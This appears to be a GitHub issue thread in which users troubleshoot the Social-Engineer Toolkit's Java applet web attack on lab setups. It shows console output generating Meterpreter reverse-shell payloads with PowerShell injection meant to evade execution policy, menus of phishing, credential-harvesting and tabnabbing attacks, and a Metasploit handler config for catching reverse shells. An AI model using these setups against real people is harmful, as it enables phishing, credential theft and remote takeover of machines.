JohnnyZam closed this issue 6 years ago
Same problems here! I tried the default options on LAN as described by Johnzam. When I had to configure the payload something went wrong, and it led me to the menu of SET. I had this:

```
Set:payloads> Enter the number for the payload [meterpreter_reverse_https]:1
[*] Prepping pyInjector for delivery..
[*] Prepping website for pyInjector shellcode injection..
[*] Base64 encoding shellcode and prepping for delivery..
[*] Multi/Pyinjection was specified. Overriding config options.
[*] Generating x86-based powershell injection code...
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...

Web Server Launched. Welcome to the SET Web Attack.

[--] Tested on Windows, Linux, and OSX [--]
[*] Moving payload into cloned website.
[*] The site has been moved. SET Web Server is now listening..

The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.

The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.

The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.

The Web-Jacking Attack method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.

The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.

The HTA Attack method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) Full Screen Attack Method
   8) HTA Attack Method

  99) Return to Main Menu

set:webattack>
```
So when I had this, I moved the files which were in .set/web_clone/ to /var/www/html/. Then I started the apache2 service manually (service apache2 stop, then restart, then status). Then I tried to reach the site on LAN; it worked but the Java applet didn't appear. I checked whether the option to run Java applets was enabled in Firefox or IE, and it was. So I don't understand why it's not working.

Can you help me find out what's wrong? Maybe I missed something ^^
This should be fixed in version 7.8... For the time being you can edit /etc/setoolkit/set.config and turn APACHE_SERVER to ON.
Issue with Java applet attack
Tried setting APACHE_SERVER to ON in /etc/setoolkit/set.config, but then MSF doesn't launch. The file /root/.set/meta_config has the data below:

```
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST xx.xx.xx.xx
set LPORT 443
set EnableStageEncoding false
set ExitOnSession false
exploit -j
```
```
set:payloads> Enter the number for the payload [meterpreter_reverse_https]:2
[*] Reverse_HTTPS takes a few seconds to calculate..One moment..
No encoder or badchars specified, outputting raw payload
Payload size: 381 bytes
Final size of c file: 1626 bytes
[*] Prepping pyInjector for delivery..
[*] Prepping website for pyInjector shellcode injection..
[*] Base64 encoding shellcode and prepping for delivery..
[*] Multi/Pyinjection was specified. Overriding config options.
[*] Generating x86-based powershell injection code...
[*] Reverse_HTTPS takes a few seconds to calculate..One moment..
No encoder or badchars specified, outputting raw payload
Payload size: 381 bytes
Final size of c file: 1626 bytes
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[*] Apache appears to be running, moving files into Apache's home

Web Server Launched. Welcome to the SET Web Attack.

[--] Tested on Windows, Linux, and OSX [--]
[--] Apache web server is currently in use for performance. [--]
[*] Moving payload into cloned website.
[*] The site has been moved. SET Web Server is now listening..
[*] Everything has been moved over to Apache and is ready to go.

Press <return> to continue

The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.

The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.

The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.

The Web-Jacking Attack method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.

The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.

The HTA Attack method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) Full Screen Attack Method
   8) HTA Attack Method

  99) Return to Main Menu

set:webattack>
```
Tried opening msfconsole manually and setting options similar to the meta_config, but when the client-side (Windows 7 SP1 with Java 8 SE) attack is launched and the Java applet is executed in the client-side IE browser (the user gets the Java warning and clicks run), the reverse connection is not received.
@henrymendonca I'm going through the same issue. Executed in the client side but no reverse connection is created. Did you find a solution?
@henrymendonca, I met the same issue as you. It goes back to the main menu again. aaaaaa!!!!! So desperate. Have you solved it? Waiting for your answer online.
Expected Behaviour
I am currently using SET version 7.7.9 on a Kali Rolling distro and wanted to give the Java Applet Attack Method a try. When selecting "Web Templates", I then select "no" to NAT, followed by inputting my local IP, I then choose the "Use the applet built into SET" option. The "Okay! Using the one built into SET..." message appears. What should appear next is the "select a template" list which shows:
Actual Behaviour

Instead of the five option menu above for the select template, I get the following after choosing "Use the applet built into SET":
```
For templates, when a POST is initiated to harvest credentials, you will need a site for it to redirect.

You can configure this option under:

Edit this file, and change HARVESTER_REDIRECT and HARVESTER_URL to the sites you want to redirect to after it is posted. If you do not set these, then it will not redirect properly. This only goes for templates.
```
If I choose option 1, I get:
```
Name:                                       Description:

1) Meterpreter Memory Injection (DEFAULT)   This will drop a meterpreter payload through powershell injection
2) Meterpreter Multi-Memory Injection       This will drop multiple Metasploit payloads via powershell injection
3) SE Toolkit Interactive Shell             Custom interactive reverse toolkit designed for SET
4) SE Toolkit HTTP Reverse Shell            Purely native HTTP shell with AES encryption support
5) RATTE HTTP Tunneling Payload             Security bypass payload that will tunnel all comms over HTTP
6) ShellCodeExec Alphanum Shellcode         This will drop a meterpreter payload through shellcodeexec
7) Import your own executable               Specify a path for your own executable
8) Import your own commands.txt             Specify payloads to be sent via command line
```
I'll arbitrarily choose option 1, then enter 443 for the port listener and get the following options:
```
Select the payload you want to deliver via shellcode injection

1) Windows Meterpreter Reverse TCP
2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager
4) Windows Meterpreter (ALL PORTS) Reverse TCP
```
I'll choose option 1, and the process will hang at:
```
Web Server Launched. Welcome to the SET Web Attack.

[--] Tested on Windows, Linux, and OSX [--]
[*] Moving payload into cloned website.
[*] The site has been moved. SET Web Server is now listening..
```
I'm not sure why it's mentioning "cloned website" when I chose the Web templates option to push the Java update .exe.
Please let me know what I'm missing and / or if you need additional information.
P.S. I did try the password harvester a couple of weeks ago and that worked fine.
SET version is 7.7.9
Kali version:

```
Description: Kali GNU/Linux Rolling
Release: kali-rolling
Codename: kali-rolling
```
Running on VMWare workstation 12